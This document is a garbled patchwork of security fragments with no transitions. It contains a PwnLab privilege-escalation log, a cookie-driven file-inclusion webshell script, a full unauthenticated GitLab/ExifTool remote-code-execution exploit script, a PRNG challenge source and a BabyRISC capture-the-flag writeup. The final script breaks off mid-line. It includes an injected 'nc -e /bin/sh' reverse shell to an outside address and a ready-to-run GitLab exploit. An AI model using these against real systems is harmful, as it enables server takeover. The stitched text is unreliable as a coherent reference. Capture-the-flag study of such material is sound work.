kane@pwnlab:~$ cd /tmp
kane@pwnlab:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:/tmp$ echo '/bin/bash' >> cat
kane@pwnlab:/tmp$ chmod +x /tmp/cat
kane@pwnlab:/tmp$ export PATH=/tmp:$PATH
kane@pwnlab:/tmp$ ~/msgmike
mike@pwnlab:/tmp$ whoami
whoami
mike
```

In mike's home directory we find a `msg2root` binary.

![](<../../.gitbook/assets/image (14) (1) (1) (1).png>)

The msg2root source presumably looks like:

```
#include <iostream>
char msg[1024]; //Let's assume no BO takes place, alrighty?
char command[1024];
int main()
{
    printf("Message for root: ");
    scanf("%s", msg);
    snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg);
    system(command);
}
```

Since our input is passed straight into `system()`, we inject a command for a direct nc reverse shell. Although this gives us root, no flag.txt could be found in the end.

![](<../../.gitbook/assets/image (24) (1) (1) (1) (1).png>)

```
hello; $(nc -e /bin/sh 192.168.0.8 11111)
```

![image-20230208155711180](../../.gitbook/assets/image-20230208155711180.png)
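As mentioned above, the cookie-based inclusion step is easy to script. The sketch below assumes the uploaded GIF carries a PHP stub of the form `<?php system($_GET['cmd']); ?>` - the writeup does not show the exact image payload, so treat the `cmd` parameter as hypothetical; the upload path is the one observed above.

```python
import requests

TARGET = "http://192.168.0.27/"
# Path of the uploaded image webshell, relative to the lang/ include directory.
UPLOADED = "../upload/450619c0f9b99fca3f46d28787bc55c5.gif"

# index.php does include("lang/" . $_COOKIE['lang']), so the traversal above
# makes it execute our uploaded "image".
resp = requests.get(
    TARGET,
    cookies={"lang": UPLOADED},
    params={"cmd": "id"},  # assumes a <?php system($_GET['cmd']); ?> stub
)
print(resp.text)
```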
# Proof of concept for the unauthenticated GitLab RCE via ExifTool: a DjVu
# file whose ANTa annotation smuggles Perl qx{...} into the Copyright field
# (ExifTool CVE-2021-22204, reachable through GitLab's upload endpoint,
# GitLab CVE-2021-22205).
# Usage: python3 exploit.py http://target 'command'
import sys
import re
import requests

target = sys.argv[1]
command = sys.argv[2]
session = requests.session()

CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')


def get_payload(command):
    # Hand-crafted DjVu container: "AT&TFORM" magic, a FORM/DJVU INFO chunk,
    # then an ANTa chunk carrying the (metadata ...) record with the command.
    rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d'  # "AT&TFORM" magic
    rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True)  # FORM length
    rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61'  # DJVU, INFO chunk, BGjp, ANTa tag
    rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True)  # ANTa chunk length
    # (metadata (Copyright "\ " . qx{<command>} . \ " b ") ) - the qx{} is
    # evaluated by vulnerable ExifTool versions when parsing the annotation.
    rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b'
    rce_payload += command.encode()
    rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
    return rce_payload


def csrf_token():
    # GitLab embeds a CSRF token in the sign-in page; grab it for the upload POST.
    response = session.get(f'{target}/users/sign_in', headers={'Origin': target})
    g = CSRF_PATTERN.search(response.content)
    assert g, 'No CSRF Token found'
    return g.group(1).decode()


def exploit():
    # Upload the malicious "image"; the server runs ExifTool on it, which
    # executes the embedded command. No authentication is required.
    files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))]
    session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()})


if __name__ == '__main__':
    exploit()
    print('finish test')
#!/usr/bin/python3
# Challenge source. randgen() is an xorshift-style PRNG over a 64-word state
# (shift constants a=3, b=13, c=37); the jump() fast-forward implementation
# has been redacted ("# Deleted...") and is the part to reconstruct.

s = []
p = 0

def init():
    global s,p
    s = [i for i in range(0,64)]
    p = 0
    return

def randgen():
    global s,p
    a = 3
    b = 13
    c = 37
    s0 = s[p]
    p = (p + 1) & 63
    s1 = s[p]
    res = (s0 + s1) & ((1<<64)-1)
    s1 ^= (s1 << a) & ((1<<64)-1)
    s[p] = (s1 ^ s0 ^ (s1 >> b) ^ (s0 >> c)) & ((1<<64)-1)
    return res

def jump(to):
    # Deleted...
    return

def check_jump():
    # Sanity checks: jump(n) must be equivalent to calling randgen() n times.
    init()
    jump(10000)
    assert randgen() == 7239098760540678124
    init()
    jump(100000)
    assert randgen() == 17366362210940280642
    init()
    jump(1000000)
    assert randgen() == 13353821705405689004
    init()
    jump(10000000)
    assert randgen() == 1441702120537313559
    init()
    for a in range(31337):randgen()
    for a in range(1234567):randgen()
    buf = randgen()
    for a in range(7890123):randgen()
    buf2 = randgen()
    init()
    jump(31337+1234567)
    print (buf == randgen())
    jump(7890123)
    print (buf2 == randgen())

check_jump()

init()
for a in range(31337):randgen()

# Each flag byte is XORed with a keystream byte, and the generator is then
# jumped ahead by a masked output value, so decryption requires a working jump().
flag = open("flag.txt").read()
assert len(flag) == 256
enc = b""
for x in range(len(flag)):
    buf = randgen()
    sh = x//2
    if sh > 64:sh = 64
    mask = (1 << sh) - 1
    buf &= mask
    jump(buf)
    enc += bytes([ ord(flag[x]) ^ (randgen() & 0xff) ])

print ("%r" % enc)
open("enc.dat","wb").write(bytearray(enc))
# ForceCoin Category: PWN, 150 points ## Description > Following ARM's success, I went ahead and designed my own RISC assembly language. > > I wrote a simulator, so you'll be able to run your own programs and enjoy the (very) reduced instruction set! > > Of course, with such minimal implementation, reading the flag is impossible. An archive file was attached, containing the following files: ```console root@kali:/media/sf_CTFs/shabak/BabyRISC# tree BabyRISC BabyRISC ├── babyrisc ├── Dockerfile ├── inc │   ├── asm_execution.h │   ├── asm_file_generation.h │   ├── asm_file_parsing.h │   ├── asm_instructions.h │   ├── asm_processor_state.h │   ├── asm_types.h │   ├── common.h │   └── prompt.h ├── Makefile ├── payload_builder │   ├── build_payload.c │   └── Makefile ├── src │   ├── asm_execution.c │   ├── asm_file_generation.c │   ├── asm_file_parsing.c │   ├── asm_instructions.c │   ├── asm_processor_state.c │   ├── main.c │   └── prompt.c └── ynetd ``` We won't attach the complete sources since they are quite long. The following is a reduced version. ### main.c ```c #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include "prompt.h" #include "common.h" #include "asm_types.h" #include "asm_file_generation.h" #include "asm_execution.h" #define MAX_FLAG_SIZE (256) #define FLAG_FILE_PATH "flag" #define MAX_ADMIN_PAYLOAD_SIZE (1024) #define MAX_USER_PAYLOAD_SIZE (4096) #define TERMINATE_MARKER_UINT32 (0xfffffffful) static void disable_io_buffering(void) { // ... } // Reads the flag from the flag file into the buffer. // The flag is written null-terminated (and the rest of the buffer is padded with nulls). // Return 0 on success, otherwise - error. static int read_flag(char * buffer, size_t buffer_len) { // ... } // Writes the admin shellcode to the 'payload' buffer. // Writes the actual size of the payload to 'payload_size_out'. static int generate_admin_code(uint8_t * payload, size_t max_size, size_t * payload_size_out) { int ret = E_SUCCESS; char flag_string[MAX_FLAG_SIZE] = { 0 }; FILE * payload_fp = NULL; ret = read_flag(flag_string, sizeof(flag_string)); if (ret != E_SUCCESS) { printf("Failed to read flag.\n"); goto cleanup; } payload_fp = fmemopen(payload, max_size, "w"); if (payload_fp == NULL) { ret = E_FOPEN; goto cleanup; } // Write admin shellcode to payload buffer // (Because E_SUCCESS == 0, we just OR all the return values, to check for error when we finish). 
ret = E_SUCCESS; // Pad out with newlines for (size_t i = 0; i < 8; ++i) { ret |= file_write_opcode(payload_fp, PRINTNL); } // If the user sets R0 so (R0 * 42) == 1 (impossible!), she deserves to read the flag ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, 42); ret |= file_write_opcode3(payload_fp, MUL, ASM_REGISTER_R2, ASM_REGISTER_R0, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, SUBI, ASM_REGISTER_R2, ASM_REGISTER_R2, 1); ret |= file_write_opcode1(payload_fp, RETNZ, ASM_REGISTER_R2); // Print each 4-bytes of the flag as 4-characters // (We might print some trailing null-characters if the flag length is not divisible by 4) int32_t * flag_start = (int32_t *)flag_string; int32_t * flag_end = (int32_t *)((char *)flag_string + strlen(flag_string)); for (int32_t * p = flag_start; p <= flag_end; ++p) { int32_t dword = *p; ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, dword); for (size_t j = 0; j < 4; j++) { ret |= file_write_opcode1(payload_fp, PRINTC, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, ROR, ASM_REGISTER_R1, ASM_REGISTER_R1, 8); } } ret |= file_write_opcode(payload_fp, PRINTNL); ret |= file_write_opcode(payload_fp, RET); // Check if some error (other than E_SUCCESS) was recieved during the admin code generation if (ret != E_SUCCESS) { ret = E_ADMIN_CODE_ERR; goto cleanup; } // Success long offset = ftell(payload_fp); if (offset == -1) { ret = E_FTELL; goto cleanup; } *payload_size_out = (size_t)offset; cleanup: if (payload_fp != NULL) { fclose(payload_fp); } return ret; } // Read the user code from 'stdin'. The code must be terminated with 4 0xff bytes (0xffffffff). // The code maximum size is 'max_size'. static int read_user_code(uint8_t * payload, size_t max_size, size_t * payload_size_out) { // ... } int main(void) { int ret = E_SUCCESS; disable_io_buffering(); uint8_t admin_payload[MAX_ADMIN_PAYLOAD_SIZE] = { 0 }; size_t admin_payload_size = 0; uint8_t user_payload[MAX_USER_PAYLOAD_SIZE] = { 0 }; size_t user_payload_size = 0; uint8_t * combined_payload = NULL; size_t combined_payload_size = 0; ret = generate_admin_code(admin_payload, sizeof(admin_payload), &admin_payload_size); if (ret != E_SUCCESS) { printf("Failed to generate admin code\n"); goto cleanup; } ret = read_user_code(user_payload, sizeof(user_payload), &user_payload_size); if (ret != E_SUCCESS) { printf("Failed to read code from user (stdin).\n"); goto cleanup; } printf("User payload size: %ld\n", user_payload_size); // Combine the payloads combined_payload_size = user_payload_size + admin_payload_size; combined_payload = malloc(combined_payload_size); if (combined_payload == NULL) { ret = E_NOMEM; goto cleanup; } memcpy(combined_payload, user_payload, user_payload_size); memcpy(&combined_payload[user_payload_size], admin_payload, admin_payload_size); // Execute the code! 
PROMPT_PRINTF_COLOR(GRN, "Executing code!\n"); ret = execute_asm_memory(combined_payload, combined_payload_size); cleanup: return ret; } ``` ### asm_processor_state.h ```c #pragma once #ifndef __ASM_PROCESSOR_STATE_H #define __ASM_PROCESSOR_STATE_H #include "asm_types.h" #include "common.h" // Registers indices typedef enum asm_register_e { ASM_REGISTER_START, ASM_REGISTER_ZERO = ASM_REGISTER_START, ASM_REGISTER_R0, ASM_REGISTER_R1, ASM_REGISTER_R2, ASM_REGISTER_R3, ASM_REGISTER_R4, ASM_REGISTER_R5, ASM_REGISTER_R6, ASM_REGISTER_SP, ASM_REGISTER_END } asm_register_t; #define ASM_STACK_SIZE (4096) extern uint8_t asm_stack[ASM_STACK_SIZE]; extern reg_value_t registers[ASM_REGISTER_END - ASM_REGISTER_START]; void initialize_context(void); int read_reg(asm_register_t reg, reg_value_t * reg_out); int write_reg(asm_register_t reg, reg_value_t value); #endif /* __ASM_PROCESSOR_STATE_H */ ``` ### asm_processor_state.c ```c #include <string.h> #include "asm_processor_state.h" // The actual stack & registers of the processor uint8_t asm_stack[ASM_STACK_SIZE] = { 0 }; reg_value_t registers[ASM_REGISTER_END - ASM_REGISTER_START] = { 0 }; void initialize_context(void) { memset(registers, 0, sizeof(registers)); memset(asm_stack, 0, sizeof(asm_stack)); } int read_reg(asm_register_t reg, reg_value_t * reg_out) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_R_INVLD_REG; } *reg_out = registers[reg]; return E_SUCCESS; } int write_reg(asm_register_t reg, reg_value_t value) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_W_INVLD_REG; } else if (reg == ASM_REGISTER_ZERO) { return E_W2ZERO; } registers[reg] = value; return E_SUCCESS; } ``` ### asm_instructions.c ```c #include "asm_instructions.h" #include "asm_processor_state.h" #include "asm_file_parsing.h" #include "string.h" #define _rotl(x, r) (((x) << (r)) | ((x) >> (32 - (r)))) #define _rotr(x, r) (((x) >> (r)) | ((x) << (32 - (r)))) // The INSTRUCTION_DEFINE_BINARY_* macros below allow you to quickly define binary operations without // implementing any code yourself. Just pass the "operator" to be applied. // Define binary operation (which is: "reg0 = reg1 (op) reg2") // Here just pass the 'operator' as the (op) being made #define INSTRUCTION_DEFINE_BINARY_OP(opcode, operator) \ INSTRUCTION_DEFINE_OP3(opcode) \ { \ //... \ } // Define binary 32-bit immediate operation (which is: "reg0 = reg1 (op) imm32") // Here just pass the 'operator' as the (op) being made #define INSTRUCTION_DEFINE_BINARY_IMM32_OP(opcode, operator) \ INSTRUCTION_DEFINE_OP_IMM32(opcode) \ { \ //... \ } // Each of the INSTRUCTION_DEFINE_OP* macros below allow you to define new instructions. // The effect of using these macros is generating a new symbol "__INSTRUCTION_DEFINE_(opcode)", which contains // the implementation for the opcode itself. The code you will write after the invocation will be the // "__INSTRUCTION_IMPL_(opcode)" symbol, which gets as parameters the registers / immediate of the instruction. // Define instruction with no operands #define INSTRUCTION_DEFINE_OP0(opcode) \ //... \ // Define instruction with a single register operand #define INSTRUCTION_DEFINE_OP1(opcode) \ //... \ // Define instruction with two registers operand #define INSTRUCTION_DEFINE_OP2(opcode) \ //... \ // Define instruction with three registers operand #define INSTRUCTION_DEFINE_OP3(opcode) \ //... \ // Define instruction with two registers operands and a single 32-bit immediate #define INSTRUCTION_DEFINE_OP_IMM32(opcode) \ //... 
\ // Actually define all the binary operations INSTRUCTION_DEFINE_BINARY_OP(AND, &) INSTRUCTION_DEFINE_BINARY_OP(ADD, +) INSTRUCTION_DEFINE_BINARY_OP(XOR, ^) INSTRUCTION_DEFINE_BINARY_OP(SUB, -) INSTRUCTION_DEFINE_BINARY_OP(MUL, *) INSTRUCTION_DEFINE_BINARY_OP(OR, |) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ANDI, &) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ADDI, +) INSTRUCTION_DEFINE_BINARY_IMM32_OP(XORI, ^) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SUBI, -) INSTRUCTION_DEFINE_BINARY_IMM32_OP(MULI, *) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ORI, |) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SHR, >>) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SHL, <<) // Actually define all other instructions INSTRUCTION_DEFINE_OP0(PRINTNL) { printf("\n"); return E_SUCCESS; } INSTRUCTION_DEFINE_OP1(PRINTDX) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%x", value); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PRINTDD) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%d", value); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PRINTC) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%c", value & 0xff); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(RET) { return E_RETURN; } INSTRUCTION_DEFINE_OP1(RETNZ) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } if (value != 0) { ret = E_RETURN; } cleanup: return ret; } INSTRUCTION_DEFINE_OP1(RETZ) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } if (value == 0) { ret = E_RETURN; } cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PUSH) { int ret = E_SUCCESS; reg_value_t reg_val = 0; reg_value_t sp_val = 0; ret = read_reg(reg0, &reg_val); if (ret != E_SUCCESS) { goto cleanup; } ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)0 || sp_val > (reg_value_t)(ASM_STACK_SIZE - sizeof(reg_val))) { ret = E_STACK_VIOLATION; goto cleanup; } memcpy(&asm_stack[sp_val], &reg_val, sizeof(reg_val)); ret = write_reg(ASM_REGISTER_SP, sp_val + sizeof(reg_val)); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(POP) { int ret = E_SUCCESS; reg_value_t reg_val = 0; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(reg_val) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val -= sizeof(reg_val); memcpy(&reg_val, &asm_stack[sp_val], sizeof(reg_val)); ret = write_reg(reg0, reg_val); if (ret != E_SUCCESS) { goto cleanup; } ret = write_reg(ASM_REGISTER_SP, sp_val); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(PUSHCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)0 || sp_val > (reg_value_t)(ASM_STACK_SIZE - sizeof(registers))) { ret = E_STACK_VIOLATION; goto cleanup; } memcpy(&asm_stack[sp_val], registers, sizeof(registers)); ret = write_reg(ASM_REGISTER_SP, sp_val + sizeof(registers)); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(POPCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(registers) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val 
-= sizeof(registers); memcpy(registers, &asm_stack[sp_val], sizeof(registers)); cleanup: return ret; } // We must implement division fully in-order to handle division-by-zero. INSTRUCTION_DEFINE_OP3(DIV) { int ret = E_SUCCESS; reg_value_t value1 = 0; reg_value_t value2 = 0; ret = read_reg(reg1, &value1); if (ret != E_SUCCESS) { goto cleanup; } ret = read_reg(reg2, &value2); if (ret != E_SUCCESS) { goto cleanup; } if (value2 == 0) { ret = E_DIV_ZERO; goto cleanup; } value1 = value1 / value2; ret = write_reg(reg0, value1); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } // We must implement division fully in-order to handle division-by-zero. INSTRUCTION_DEFINE_OP_IMM32(DIVI) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } if (imm32 == 0) { ret = E_DIV_ZERO; goto cleanup; } value = value / imm32; ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } INSTRUCTION_DEFINE_OP_IMM32(ROL) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } value = _rotl(value, imm32); ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } INSTRUCTION_DEFINE_OP_IMM32(ROR) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } value = _rotr(value, imm32); ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } // This is the table containing the function pointers for the instructions implementations. // If you add an instruction, add the INSTRUCTION_SYMBOL entry to this table with the opcode value. #define INSTRUCTION_SYMBOL(opcode) [opcode] = __INSTRUCTION_DEFINE_##opcode instruction_definition_t asm_instruction_definitions[MAX_ASM_OPCODE_VAL] = { INSTRUCTION_SYMBOL(ADD), INSTRUCTION_SYMBOL(ADDI), INSTRUCTION_SYMBOL(AND), INSTRUCTION_SYMBOL(ANDI), INSTRUCTION_SYMBOL(DIV), INSTRUCTION_SYMBOL(DIVI), INSTRUCTION_SYMBOL(MUL), INSTRUCTION_SYMBOL(MULI), INSTRUCTION_SYMBOL(OR), INSTRUCTION_SYMBOL(ORI), INSTRUCTION_SYMBOL(PRINTC), INSTRUCTION_SYMBOL(PRINTDD), INSTRUCTION_SYMBOL(PRINTDX), INSTRUCTION_SYMBOL(PRINTNL), INSTRUCTION_SYMBOL(RET), INSTRUCTION_SYMBOL(RETNZ), INSTRUCTION_SYMBOL(RETZ), INSTRUCTION_SYMBOL(ROL), INSTRUCTION_SYMBOL(ROR), INSTRUCTION_SYMBOL(SHL), INSTRUCTION_SYMBOL(SHR), INSTRUCTION_SYMBOL(SUB), INSTRUCTION_SYMBOL(SUBI), INSTRUCTION_SYMBOL(XOR), INSTRUCTION_SYMBOL(XORI), INSTRUCTION_SYMBOL(PUSH), INSTRUCTION_SYMBOL(POP), INSTRUCTION_SYMBOL(PUSHCTX), INSTRUCTION_SYMBOL(POPCTX), }; ``` ## Solution: This looks like some sort of a virtual machine implementing a RISC instruction set. The main function reads some instructions from the user, then appends some "admin" instructions which print the flag under certain conditions: ```c // If the user sets R0 so (R0 * 42) == 1 (impossible!), she deserves to read the flag ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, 42); ret |= file_write_opcode3(payload_fp, MUL, ASM_REGISTER_R2, ASM_REGISTER_R0, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, SUBI, ASM_REGISTER_R2, ASM_REGISTER_R2, 1); ret |= file_write_opcode1(payload_fp, RETNZ, ASM_REGISTER_R2); ``` Our goal is to set R0 to that `(R0 * 42) == 1`. As the comment says, that's impossible if we follow the rules, therefore we must bypass them. 
Let's convert the code above to easier-to-view pseudo-code: ``` REG_R1 = REG_ZERO + 42 REG_R2 = REG_R0 * REG_R1 REG_R2 = REG_R2 - 1 IF <result> != 0 { RETURN } ``` `ASM_REGISTER_ZERO` is a register that always returns the value of zero. It would be nice if we could override it with a different value, since that would let us manipulate the equation, but the virtual machine blocks this explicitly: ```c int write_reg(asm_register_t reg, reg_value_t value) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_W_INVLD_REG; } else if (reg == ASM_REGISTER_ZERO) { return E_W2ZERO; } registers[reg] = value; return E_SUCCESS; } ``` Or does it? Let's take a closer look at where the virtual machine stores its register values: The global `registers` array. Using `write_reg` is one way to modify the value of registers, but it blocks changing `ASM_REGISTER_ZERO` as we saw. Luckily, there seems to be another function modifying the array which is less restrictive: ```c INSTRUCTION_DEFINE_OP0(POPCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(registers) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val -= sizeof(registers); memcpy(registers, &asm_stack[sp_val], sizeof(registers)); cleanup: return ret; } ``` This function is the counterpart of `PUSHCTX`, which pushes all registers to the stack. Using this function, the register values get popped back from the stack to the registers themselves. Yes, even `ASM_REGISTER_ZERO`. So, if we want to modify the value of `ASM_REGISTER_ZERO`, we just need to prepare a stack where the value we want to write is located at the correct location to be popped into the register array. Now that we know how to write, let's find the value we want to write. Looks like we can fix the equation by setting `ASM_REGISTER_ZERO` to `-41` and setting `ASM_REGISTER_R0` to `1`: ``` REG_R1 = REG_ZERO + 42 ; REG_R1 = -41 + 42 = 1 REG_R2 = REG_R0 * REG_R1 ; REG_R2 = 1 * 1 = 1 REG_R2 = REG_R2 - 1 ; REG_R2 = 1 - 1 = 0 IF <result> != 0 { RETURN } ``` In the attached files we have received a program called `payload_builder`, which allows us to build a payload using C instructions just like the main function does. We'll use the following payload: ```c ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R0, ASM_REGISTER_ZERO, -41); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode(payload_fp, POPCTX); ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R0, ASM_REGISTER_ZERO, 42); // Note that ASM_REGISTER_ZERO is -41 at this stage ``` We build the program and run it: ```console ubuntu@cloudhost:~/BabyRISC/BabyRISC/payload_builder$ ./payload_builder Written 37 bytes to 'payload.bin'. ubuntu@cloudhost:~/BabyRISC/BabyRISC/payload_builder$ xxd payload.bin 00000000: 0101 00d7 ffff ff19 0119 0119 0119 0119 ................ 
00000010: 0119 0119 0119 0119 011c 0101 002a 0000 .............*.. 00000020: 00ff ffff ff ..... ``` Now, all that's left is to decode the flag, after it has been ROR-ed by the program via: ```c // Print each 4-bytes of the flag as 4-characters // (We might print some trailing null-characters if the flag length is not divisible by 4) int32_t * flag_start = (int32_t *)flag_string; int32_t * flag_end = (int32_t *)((char *)flag_string + strlen(flag_string)); for (int32_t * p = flag_start; p <= flag_end; ++p) { int32_t dword = *p; ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, dword); for (size_t j = 0; j < 4; j++) { ret |= file_write_opcode1(payload_fp, PRINTC, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, ROR, ASM_REGISTER_R1, ASM_REGISTER_R1, 8); } } ``` Notice that this code has run after `ASM_REGISTER_ZERO` has been set to `-41`, so to get the real `dword` value we will have to reverse the operation. We'll use the following script to retrieve and decode the flag: ```python from pwn import * import re r = remote("babyrisc.shieldchallenges.com", 9070) with open("payload.bin", "rb") as payload_file: payload = payload_file.read() log.info(f"Sending payload: \n{hexdump(payload)}") r.send(payload) log.info(f"Received: '{r.recvline().decode('ascii').rstrip()}'") log.info(f"Received: '{r.recvline().decode('ascii').rstrip()}'") output = r.recvall() print(f"Received: \n{hexdump(output)}") if flag_match := re.search(b'\n\n\n\n\n\n\n\n(.*)\n\x1b', output): flag_encoded = flag_match.group(1) ASM_REGISTER_ZERO = -41 flag = "" for value in unpack_many(flag_encoded, 32, endian='little', sign=False): real_value = value - ASM_REGISTER_ZERO for i in range(4): flag += chr(real_value & 0xFF) real_value = ror(real_value, 8, 32) log.success("Flag: {}".format(flag.rstrip('\x00'))) ``` Output: ```console root@kali:/media/sf_CTFs/shabak/BabyRISC# python3 solve.py [+] Opening connection to babyrisc.shieldchallenges.com on port 9070: Done [*] Sending payload: 00000000 01 01 00 d7 ff ff ff 19 01 19 01 19 01 19 01 19 │····│····│····│····│ 00000010 01 19 01 19 01 19 01 19 01 1c 01 01 00 2a 00 00 │····│····│····│·*··│ 00000020 00 ff ff ff ff │····│·│ 00000025 [*] Received: 'User payload size: 33' [*] Received: '>>> Executing code!' [+] Receiving all data: Done (106B) [*] Closed connection to babyrisc.shieldchallenges.com port 9070 Received: 00000000 1b 5b 30 6d 0a 0a 0a 0a 0a 0a 0a 0a 3d 6c 61 67 │·[0m│····│····│=lag│ 00000010 52 52 49 53 1a 5f 64 6f 3c 73 6e 74 36 72 65 64 │RRIS│·_do│<snt│6red│ 00000020 4c 63 65 5f 38 6d 6f 75 45 74 5f 6f 3d 5f 62 75 │Lce_│8mou│Et_o│=_bu│ 00000030 3e 73 5f 61 3d 74 65 72 36 61 6c 6c 54 00 00 00 │>s_a│=ter│6all│T···│ 00000040 0a 1b 5b 33 36 6d 3e 3e 3e 20 1b 5b 30 6d 65 78 │··[3│6m>>│> ·[│0mex│ 00000050 65 63 75 74 65 64 20 30 78 38 46 20 69 6e 73 74 │ecut│ed 0│x8F │inst│ 00000060 72 75 63 74 69 6f 6e 73 0a 0a │ruct│ions│··│ 0000006a [+] Flag: flag{RISC_doesnt_reduce_amount_of_bugs_after_all} ```
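Incidentally, the user payload is simple enough to emit without the C `payload_builder`. The opcode and register encodings below are read straight off the xxd dump above (ADDI = `0x01`, PUSH = `0x19`, POPCTX = `0x1c`, registers ZERO = `0x00`, R0 = `0x01`) - a sketch inferred from the dump, not from a spec:

```python
import struct

ADDI, PUSH, POPCTX = 0x01, 0x19, 0x1c  # inferred from the xxd dump above
ZERO, R0 = 0x00, 0x01

# ADDI R0, ZERO, -41; PUSH R0 x9; POPCTX; ADDI R0, ZERO, 42; terminator.
payload = bytes([ADDI, R0, ZERO]) + struct.pack("<i", -41)
payload += bytes([PUSH, R0]) * 9
payload += bytes([POPCTX])
payload += bytes([ADDI, R0, ZERO]) + struct.pack("<i", 42)
payload += b"\xff\xff\xff\xff"  # TERMINATE_MARKER_UINT32

# Matches the 37-byte payload.bin shown above.
assert payload.hex() == "010100d7ffffff" + "1901" * 9 + "1c" + "0101002a000000" + "ffffffff"
with open("payload.bin", "wb") as f:
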